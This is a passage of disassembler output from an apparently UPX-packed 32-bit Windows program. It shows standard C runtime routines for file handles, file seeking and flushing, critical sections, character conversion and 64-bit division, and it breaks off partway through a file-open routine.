mov eax, [ebp+arg_10]
mov [ebp+var_34], eax
jmp short loc_421AA1
; ---------------------------------------------------------------------------
loc_421A43: ; CODE XREF: sub_4218F8+129�j
cmp [ebp+var_3C], edi
jnz short loc_421A5E
push edi
push edi
push edi
push edi
push esi
push ebx
push edi
push [ebp+arg_4]
call dword_42410C ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz short loc_421AA1
loc_421A5E: ; CODE XREF: sub_4218F8+14E�j
push esi
push 1
call sub_420529
pop ecx
pop ecx
mov [ebp+var_34], eax
cmp eax, edi
jz short loc_421AA1
push edi
push edi
push esi
push eax
push esi
push ebx
push edi
push [ebp+arg_4]
call dword_42410C ; WideCharToMultiByte
cmp eax, edi
jnz short loc_421A91
push [ebp+var_34]
call sub_419DDD
pop ecx
mov [ebp+var_34], edi
jmp short loc_421AA1
; ---------------------------------------------------------------------------
loc_421A91: ; CODE XREF: sub_4218F8+189�j
cmp [ebp+var_40], 0FFFFFFFFh
jz short loc_421AA1
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_421AA1
; ---------------------------------------------------------------------------
loc_421A9E: ; CODE XREF: sub_4218F8+2D�j
mov ebx, [ebp+var_48]
loc_421AA1: ; CODE XREF: sub_4218F8+120�j
; sub_4218F8+141�j ...
cmp [ebp+var_44], edi
jz short loc_421AAD
push ebx
call sub_419DDD
pop ecx
loc_421AAD: ; CODE XREF: sub_4218F8+1AC�j
mov eax, [ebp+var_34]
loc_421AB0: ; CODE XREF: sub_4218F8+FF�j
lea esp, [ebp-54h]
mov ecx, [ebp+var_1C]
call sub_4192B6
call __SEH_epilog
retn
sub_4218F8 endp
; =============== S U B R O U T I N E =======================================
sub_421AC1 proc near ; CODE XREF: sub_421B35+52�p
; sub_4222C9+263�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_421F0B
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_421AE2
call sub_41E685
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_421AE2: ; CODE XREF: sub_421AC1+F�j
push edi
push [esp+8+arg_8]
push 0
push [esp+10h+arg_4]
push eax
call dword_424024 ; SetFilePointer
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_421B03
call dword_42412C ; RtlGetLastWin32Error
jmp short loc_421B05
; ---------------------------------------------------------------------------
loc_421B03: ; CODE XREF: sub_421AC1+38�j
xor eax, eax
loc_421B05: ; CODE XREF: sub_421AC1+40�j
test eax, eax
jz short loc_421B15
push eax
call sub_41E697
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_421B32
; ---------------------------------------------------------------------------
loc_421B15: ; CODE XREF: sub_421AC1+46�j
mov ecx, esi
and esi, 1Fh
sar ecx, 5
mov ecx, ds:dword_47C640[ecx*4]
mov eax, esi
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4+4]
and byte ptr [eax], 0FDh
mov eax, edi
loc_421B32: ; CODE XREF: sub_421AC1+52�j
pop edi
pop esi
retn
sub_421AC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421B35 proc near ; CODE XREF: sub_41C547+D0�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00421BC4 SIZE 0000001C BYTES
push 0Ch
push offset stru_426048
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, ds:dword_47C62C
jnb short loc_421BC4
mov eax, ebx
sar eax, 5
lea edi, ds:47C640h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_421BC4
push ebx
call sub_421F4C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_421B94
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_421AC1
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_421BAB
; ---------------------------------------------------------------------------
loc_421B94: ; CODE XREF: sub_421B35+49�j
call sub_41E685
mov dword ptr [eax], 9
call sub_41E68E
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_421BAB: ; CODE XREF: sub_421B35+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_421BBC
mov eax, [ebp+var_1C]
jmp short loc_421BDA
sub_421B35 endp
; =============== S U B R O U T I N E =======================================
sub_421BB9 proc near ; DATA XREF: UPX0:stru_426048�o
mov ebx, [ebp+8]
sub_421BB9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421BBC proc near ; CODE XREF: sub_421B35+7A�p
push ebx
call sub_421FEC
pop ecx
retn
sub_421BBC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421B35
loc_421BC4: ; CODE XREF: sub_421B35+15�j
; sub_421B35+35�j
call sub_41E685
mov dword ptr [eax], 9
call sub_41E68E
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_421BDA: ; CODE XREF: sub_421B35+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_421B35
; =============== S U B R O U T I N E =======================================
sub_421BE0 proc near ; CODE XREF: sub_41C547+6F�p
; sub_422605+34�p ...
arg_0 = dword ptr 4
inc dword_44BEBC
push 1000h
call sub_419DCB
test eax, eax
pop ecx
mov ecx, [esp+arg_0]
mov [ecx+8], eax
jz short loc_421C09
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_421C1A
; ---------------------------------------------------------------------------
loc_421C09: ; CODE XREF: sub_421BE0+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_421C1A: ; CODE XREF: sub_421BE0+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_421BE0 endp
; =============== S U B R O U T I N E =======================================
sub_421C24 proc near ; CODE XREF: sub_41C547+64�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_47C62C
jb short loc_421C33
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_421C33: ; CODE XREF: sub_421C24+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_47C640[ecx*4]
lea eax, [eax+eax*8]
movsx eax, byte ptr [ecx+eax*4+4]
and eax, 40h
retn
sub_421C24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421C4E proc near ; CODE XREF: sub_421CAE+1E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
push esi
xor esi, esi
cmp ecx, esi
jnz short loc_421C5F
xor eax, eax
jmp short loc_421CAB
; ---------------------------------------------------------------------------
loc_421C5F: ; CODE XREF: sub_421C4E+B�j
mov eax, [ebp+arg_0]
cmp [eax+14h], esi
jnz short loc_421C78
mov ax, [ebp+arg_8]
cmp ax, 0FFh
ja short loc_421C9D
mov [ecx], al
xor eax, eax
inc eax
jmp short loc_421CAB
; ---------------------------------------------------------------------------
loc_421C78: ; CODE XREF: sub_421C4E+17�j
lea edx, [ebp+arg_4]
push edx
push esi
push dword ptr [eax+28h]
mov [ebp+arg_4], esi
push ecx
push 1
lea ecx, [ebp+arg_8]
push ecx
push esi
push dword ptr [eax+4]
call dword_42410C ; WideCharToMultiByte
cmp eax, esi
jz short loc_421C9D
cmp [ebp+arg_4], esi
jz short loc_421CAB
loc_421C9D: ; CODE XREF: sub_421C4E+21�j
; sub_421C4E+48�j
call sub_41E685
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
loc_421CAB: ; CODE XREF: sub_421C4E+F�j
; sub_421C4E+28�j ...
pop esi
pop ebp
retn
sub_421C4E endp
; =============== S U B R O U T I N E =======================================
sub_421CAE proc near ; CODE XREF: sub_41C6EE+343�p
; sub_41C6EE+74A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
call sub_41B330
mov eax, [eax+64h]
cmp eax, off_42A5CC
jz short loc_421CC3
call sub_41B2CF
loc_421CC3: ; CODE XREF: sub_421CAE+E�j
push [esp+arg_4]
push [esp+4+arg_0]
push eax
call sub_421C4E
add esp, 0Ch
retn
sub_421CAE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_421CE0 proc near ; CODE XREF: sub_41C6EE+654�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_421D11
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+4+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+4+arg_8]
add edx, ecx
jmp short loc_421D58
; ---------------------------------------------------------------------------
loc_421D11: ; CODE XREF: sub_421CE0+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_421D1F: ; CODE XREF: sub_421CE0+49�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_421D1F
div ebx
mov esi, eax
mul [esp+4+arg_C]
mov ecx, eax
mov eax, [esp+4+arg_8]
mul esi
add edx, ecx
jb short loc_421D4D
cmp edx, [esp+4+arg_4]
ja short loc_421D4D
jb short loc_421D56
cmp eax, [esp+4+arg_0]
jbe short loc_421D56
loc_421D4D: ; CODE XREF: sub_421CE0+5D�j
; sub_421CE0+63�j
dec esi
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_421D56: ; CODE XREF: sub_421CE0+65�j
; sub_421CE0+6B�j
xor ebx, ebx
loc_421D58: ; CODE XREF: sub_421CE0+2F�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
sub_421CE0 endp
; =============== S U B R O U T I N E =======================================
sub_421D75 proc near ; DATA XREF: sub_421D85:loc_421DC7�o
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_424020 ; InitializeCriticalSection
xor eax, eax
inc eax
retn 8
sub_421D75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421D85 proc near ; CODE XREF: sub_41CF94+26�p
; sub_41D047+4C�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 10h
push offset stru_426080
call __SEH_prolog
mov eax, dword_44C288
test eax, eax
jnz short loc_421DD1
cmp dword_44C048, 1
jz short loc_421DC7
push offset aKernel32_dll ; "kernel32.dll"
call dword_424130 ; GetModuleHandleA
test eax, eax
jz short loc_421DC7
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push eax
call dword_424100 ; GetProcAddress
mov dword_44C288, eax
test eax, eax
jnz short loc_421DD1
loc_421DC7: ; CODE XREF: sub_421D85+1C�j
; sub_421D85+2B�j
mov eax, offset sub_421D75
mov dword_44C288, eax
loc_421DD1: ; CODE XREF: sub_421D85+13�j
; sub_421D85+40�j
and [ebp+ms_exc.disabled], 0
push [ebp+arg_4]
push [ebp+arg_0]
call eax ; InitializeCriticalSectionAndSpinCount
mov [ebp+var_20], eax
jmp short loc_421E06
; ---------------------------------------------------------------------------
loc_421DE2: ; DATA XREF: UPX0:stru_426080�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_1C], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_421DF0: ; DATA XREF: UPX0:stru_426080�o
mov esp, [ebp+ms_exc.old_esp]
cmp [ebp+var_1C], 0C0000017h
jnz short loc_421E04
push 8
call dword_4241C0 ; RtlRestoreLastWin32Error
loc_421E04: ; CODE XREF: sub_421D85+75�j
xor eax, eax
loc_421E06: ; CODE XREF: sub_421D85+5B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_421D85 endp
; =============== S U B R O U T I N E =======================================
sub_421E10 proc near ; CODE XREF: sub_4222C9+220�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
cmp ecx, ds:dword_47C62C
push esi
push edi
jnb short loc_421E73
mov eax, ecx
sar eax, 5
lea edi, ds:47C640h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
cmp dword ptr [esi+eax], 0FFFFFFFFh
jnz short loc_421E73
cmp dword_42A2D4, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_421E69
sub ecx, 0
jz short loc_421E60
dec ecx
jz short loc_421E5B
dec ecx
jnz short loc_421E69
push ebx
push 0FFFFFFF4h
jmp short loc_421E63
; ---------------------------------------------------------------------------
loc_421E5B: ; CODE XREF: sub_421E10+41�j
push ebx
push 0FFFFFFF5h
jmp short loc_421E63
; ---------------------------------------------------------------------------
loc_421E60: ; CODE XREF: sub_421E10+3E�j
push ebx
push 0FFFFFFF6h
loc_421E63: ; CODE XREF: sub_421E10+49�j
; sub_421E10+4E�j
call dword_4240C4 ; SetStdHandle
loc_421E69: ; CODE XREF: sub_421E10+39�j
; sub_421E10+44�j
mov eax, [edi]
mov [esi+eax], ebx
xor eax, eax
pop ebx
jmp short loc_421E89
; ---------------------------------------------------------------------------
loc_421E73: ; CODE XREF: sub_421E10+C�j
; sub_421E10+2B�j
call sub_41E685
mov dword ptr [eax], 9
call sub_41E68E
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_421E89: ; CODE XREF: sub_421E10+61�j
pop edi
pop esi
retn
sub_421E10 endp
; =============== S U B R O U T I N E =======================================
sub_421E8C proc near ; CODE XREF: sub_41DCA6+51�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp ecx, ds:dword_47C62C
push esi
push edi
jnb short loc_421EF2
mov eax, ecx
sar eax, 5
lea edi, ds:47C640h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
add eax, esi
test byte ptr [eax+4], 1
jz short loc_421EF2
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_421EF2
cmp dword_42A2D4, 1
jnz short loc_421EE8
xor eax, eax
sub ecx, eax
jz short loc_421EDF
dec ecx
jz short loc_421EDA
dec ecx
jnz short loc_421EE8
push eax
push 0FFFFFFF4h
jmp short loc_421EE2
; ---------------------------------------------------------------------------
loc_421EDA: ; CODE XREF: sub_421E8C+44�j
push eax
push 0FFFFFFF5h
jmp short loc_421EE2
; ---------------------------------------------------------------------------
loc_421EDF: ; CODE XREF: sub_421E8C+41�j
push eax
push 0FFFFFFF6h
loc_421EE2: ; CODE XREF: sub_421E8C+4C�j
; sub_421E8C+51�j
call dword_4240C4 ; SetStdHandle
loc_421EE8: ; CODE XREF: sub_421E8C+3B�j
; sub_421E8C+47�j
mov eax, [edi]
or dword ptr [esi+eax], 0FFFFFFFFh
xor eax, eax
jmp short loc_421F08
; ---------------------------------------------------------------------------
loc_421EF2: ; CODE XREF: sub_421E8C+C�j
; sub_421E8C+2D�j ...
call sub_41E685
mov dword ptr [eax], 9
call sub_41E68E
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_421F08: ; CODE XREF: sub_421E8C+64�j
pop edi
pop esi
retn
sub_421E8C endp
; =============== S U B R O U T I N E =======================================
sub_421F0B proc near ; CODE XREF: sub_41DCA6+7�p
; sub_41DCA6+1E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_47C62C
jnb short loc_421F35
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_47C640[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
test byte ptr [eax+4], 1
jz short loc_421F35
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_421F35: ; CODE XREF: sub_421F0B+A�j
; sub_421F0B+25�j
call sub_41E685
mov dword ptr [eax], 9
call sub_41E68E
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
retn
sub_421F0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421F4C proc near ; CODE XREF: sub_41DD29+38�p
; sub_41E126+38�p ...
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset stru_426090
call __SEH_prolog
mov edi, [ebp+arg_0]
mov ecx, edi
sar ecx, 5
mov eax, edi
and eax, 1Fh
lea eax, [eax+eax*8]
mov ecx, ds:dword_47C640[ecx*4]
lea esi, [ecx+eax*4]
xor ebx, ebx
cmp [esi+8], ebx
jnz short loc_421FBA
push 0Ah
call sub_41D0E7
pop ecx
mov [ebp+ms_exc.disabled], ebx
cmp [esi+8], ebx
jnz short loc_421FB1
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_421D85
pop ecx
pop ecx
test eax, eax
jnz short loc_421FAE
push 0FFFFFFFFh
lea eax, [ebp+ms_exc.prev_er]
push eax
call sub_41979A
pop ecx
pop ecx
xor eax, eax
jmp short loc_421FDA
; ---------------------------------------------------------------------------
loc_421FAE: ; CODE XREF: sub_421F4C+4F�j
inc dword ptr [esi+8]
loc_421FB1: ; CODE XREF: sub_421F4C+3B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_421FE3
loc_421FBA: ; CODE XREF: sub_421F4C+2B�j
mov eax, edi
sar eax, 5
and edi, 1Fh
lea ecx, [edi+edi*8]
mov eax, ds:dword_47C640[eax*4]
lea eax, [eax+ecx*4+0Ch]
push eax
call dword_4241AC ; RtlEnterCriticalSection
xor eax, eax
inc eax
loc_421FDA: ; CODE XREF: sub_421F4C+60�j
call __SEH_epilog
retn
sub_421F4C endp
; =============== S U B R O U T I N E =======================================
sub_421FE0 proc near ; DATA XREF: UPX0:stru_426090�o
mov edi, [ebp+8]
sub_421FE0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421FE3 proc near ; CODE XREF: sub_421F4C+69�p
push 0Ah
call sub_41D032
pop ecx
retn
sub_421FE3 endp
; =============== S U B R O U T I N E =======================================
sub_421FEC proc near ; CODE XREF: sub_41DDA0+1�p
; sub_41E1AD+1�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_47C640[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4+0Ch]
push eax
call dword_4241B0 ; RtlLeaveCriticalSection
retn
sub_421FEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42200E proc near ; CODE XREF: sub_4222C9:loc_42245D�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
; FUNCTION CHUNK AT 004220F0 SIZE 00000091 BYTES
push 14h
push offset stru_4260A0
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
push 0Bh
call sub_41D047
pop ecx
test eax, eax
jz loc_4220AF
push 0Bh
call sub_41D0E7
pop ecx
xor edi, edi
mov [ebp+ms_exc.disabled], edi
loc_42203B: ; CODE XREF: sub_42200E+105�j
mov [ebp+var_24], edi
cmp edi, 40h
jge loc_42216F
mov esi, ds:dword_47C640[edi*4]
test esi, esi
jz loc_422118
loc_422056: ; CODE XREF: sub_42200E+CE�j
mov [ebp+var_20], esi
mov eax, ds:dword_47C640[edi*4]
add eax, 480h
cmp esi, eax
jnb loc_42210C
test byte ptr [esi+4], 1
jnz short loc_4220D9
xor ebx, ebx
cmp [esi+8], ebx
jnz short loc_4220C2
push 0Ah
call sub_41D0E7
pop ecx
mov [ebp+ms_exc.disabled], 1
cmp [esi+8], ebx
jnz short loc_4220BA
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_421D85
pop ecx
pop ecx
test eax, eax
jnz short loc_4220B7
push 0FFFFFFFFh
lea eax, [ebp+ms_exc.prev_er]
push eax
call sub_41979A
pop ecx
pop ecx
loc_4220AF: ; CODE XREF: sub_42200E+1A�j
or eax, 0FFFFFFFFh
jmp loc_42217B
; ---------------------------------------------------------------------------
loc_4220B7: ; CODE XREF: sub_42200E+92�j
inc dword ptr [esi+8]
loc_4220BA: ; CODE XREF: sub_42200E+7E�j
mov [ebp+ms_exc.disabled], ebx
call sub_4220E7
loc_4220C2: ; CODE XREF: sub_42200E+6A�j
lea ebx, [esi+0Ch]
push ebx
call dword_4241AC ; RtlEnterCriticalSection
test byte ptr [esi+4], 1
jz short loc_4220F0
push ebx
call dword_4241B0 ; RtlLeaveCriticalSection
loc_4220D9: ; CODE XREF: sub_42200E+63�j
add esi, 24h
jmp loc_422056
sub_42200E endp
; =============== S U B R O U T I N E =======================================
sub_4220E1 proc near ; DATA XREF: UPX0:004260B4�o
mov edi, [ebp-24h]
mov esi, [ebp-20h]
sub_4220E1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4220E7 proc near ; CODE XREF: sub_42200E+AF�p
push 0Ah
call sub_41D032
pop ecx
retn
sub_4220E7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42200E
loc_4220F0: ; CODE XREF: sub_42200E+C2�j
or dword ptr [esi], 0FFFFFFFFh
mov eax, esi
sub eax, ds:dword_47C640[edi*4]
cdq
push 24h
pop ecx
idiv ecx
mov ecx, edi
shl ecx, 5
add eax, ecx
mov [ebp+var_1C], eax
loc_42210C: ; CODE XREF: sub_42200E+59�j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_42216F
inc edi
jmp loc_42203B
; ---------------------------------------------------------------------------
loc_422118: ; CODE XREF: sub_42200E+42�j
mov esi, 480h
push esi
call sub_419DCB
pop ecx
mov [ebp+var_20], eax
test eax, eax
jz short loc_42216F
lea ecx, ds:47C640h[edi*4]
mov [ecx], eax
add ds:dword_47C62C, 20h
loc_42213B: ; CODE XREF: sub_42200E+14A�j
mov edx, [ecx]
add edx, esi
cmp eax, edx
jnb short loc_42215A
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
and dword ptr [eax+8], 0
add eax, 24h
mov [ebp+var_20], eax
jmp short loc_42213B
; ---------------------------------------------------------------------------
loc_42215A: ; CODE XREF: sub_42200E+133�j
shl edi, 5
mov [ebp+var_1C], edi
push edi
call sub_421F4C
pop ecx
test eax, eax
jnz short loc_42216F
or [ebp+var_1C], 0FFFFFFFFh
loc_42216F: ; CODE XREF: sub_42200E+33�j
; sub_42200E+102�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_422181
mov eax, [ebp+var_1C]
loc_42217B: ; CODE XREF: sub_42200E+A4�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_42200E
; =============== S U B R O U T I N E =======================================
sub_422181 proc near ; CODE XREF: sub_42200E+165�p
; DATA XREF: UPX0:stru_4260A0�o
push 0Bh
call sub_41D032
pop ecx
retn
sub_422181 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42218A proc near ; CODE XREF: sub_41DE4C+1E�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00422232 SIZE 00000014 BYTES
push 0Ch
push offset stru_4260B8
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, ds:dword_47C62C
jnb loc_422232
mov eax, ebx
sar eax, 5
lea edi, ds:47C640h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_422232
push ebx
call sub_421F4C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_42220A
push ebx
call sub_421F0B
pop ecx
push eax
call dword_424170 ; FlushFileBuffers
test eax, eax
jnz short loc_4221F6
call dword_42412C ; RtlGetLastWin32Error
mov [ebp+var_1C], eax
jmp short loc_4221FA
; ---------------------------------------------------------------------------
loc_4221F6: ; CODE XREF: sub_42218A+5F�j
and [ebp+var_1C], 0
loc_4221FA: ; CODE XREF: sub_42218A+6A�j
cmp [ebp+var_1C], 0
jz short loc_422219
call sub_41E68E
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_42220A: ; CODE XREF: sub_42218A+4D�j
call sub_41E685
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_422219: ; CODE XREF: sub_42218A+74�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_42222A
mov eax, [ebp+var_1C]
jmp short loc_422240
sub_42218A endp
; =============== S U B R O U T I N E =======================================
sub_422227 proc near ; DATA XREF: UPX0:stru_4260B8�o
mov ebx, [ebp+8]
sub_422227 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42222A proc near ; CODE XREF: sub_42218A+93�p
push ebx
call sub_421FEC
pop ecx
retn
sub_42222A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42218A
loc_422232: ; CODE XREF: sub_42218A+15�j
; sub_42218A+39�j
call sub_41E685
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
loc_422240: ; CODE XREF: sub_42218A+9B�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_42218A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422246 proc near ; CODE XREF: sub_41DF58+65�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
push edi
push esi
mov [ebp+var_4], eax
call sub_421F0B
or edi, 0FFFFFFFFh
cmp eax, edi
pop ecx
jnz short loc_422277
call sub_41E685
mov dword ptr [eax], 9
jmp short loc_4222A0
; ---------------------------------------------------------------------------
loc_422277: ; CODE XREF: sub_422246+22�j
push [ebp+arg_C]
lea ecx, [ebp+var_4]
push ecx
push [ebp+var_8]
push eax
call dword_424024 ; SetFilePointer
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_4222A6
call dword_42412C ; RtlGetLastWin32Error
test eax, eax
jz short loc_4222A6
push eax
call sub_41E697
pop ecx
loc_4222A0: ; CODE XREF: sub_422246+2F�j
mov eax, edi
mov edx, edi
jmp short loc_4222C5
; ---------------------------------------------------------------------------
loc_4222A6: ; CODE XREF: sub_422246+47�j
; sub_422246+51�j
mov eax, esi
sar eax, 5
mov eax, ds:dword_47C640[eax*4]
and esi, 1Fh
lea ecx, [esi+esi*8]
lea eax, [eax+ecx*4+4]
and byte ptr [eax], 0FDh
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
loc_4222C5: ; CODE XREF: sub_422246+5E�j
pop edi
pop esi
leave
retn
sub_422246 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4222C9 proc near ; CODE XREF: sub_4225B0+28�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
mov edx, [ebp+arg_C]
push ebx
push esi
xor esi, esi
test dl, dl
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], esi
jns short loc_4222ED
mov [ebp+var_14], esi
mov [ebp+var_1], 10h
jmp short loc_4222F8
; ---------------------------------------------------------------------------
loc_4222ED: ; CODE XREF: sub_4222C9+19�j
mov [ebp+var_14], 1
mov [ebp+var_1], 0
loc_4222F8: ; CODE XREF: sub_4222C9+22�j
mov eax, 8000h
test edx, eax
jnz short loc_422312
test dh, 40h
jnz short loc_42230E
cmp dword_44C36C, eax
jz short loc_422312
loc_42230E: ; CODE XREF: sub_4222C9+3B�j
or [ebp+var_1], 80h
loc_422312: ; CODE XREF: sub_4222C9+36�j
; sub_4222C9+43�j
push 3
mov eax, edx
pop ebx
and eax, ebx
sub eax, esi
jz short loc_422335
dec eax
jz short loc_42232C
dec eax
jnz short loc_422350
mov [ebp+var_10], 0C0000000h
jmp short loc_42233C
; ---------------------------------------------------------------------------
loc_42232C: ; CODE XREF: sub_4222C9+55�j
mov [ebp+var_10], 40000000h
jmp short loc_42233C
; ---------------------------------------------------------------------------
loc_422335: ; CODE XREF: sub_4222C9+52�j
mov [ebp+var_10], 80000000h
loc_42233C: ; CODE XREF: sub_4222C9+61�j
; sub_4222C9+6A�j
cmp ecx, 10h
jz short loc_422381
cmp ecx, 20h
jz short loc_422378
cmp ecx, 30h
jz short loc_42236F
cmp ecx, 40h
jz short loc_42236A
loc_422350: ; CODE XREF: sub_4222C9+58�j
call sub_41E685
mov dword ptr [eax], 16h
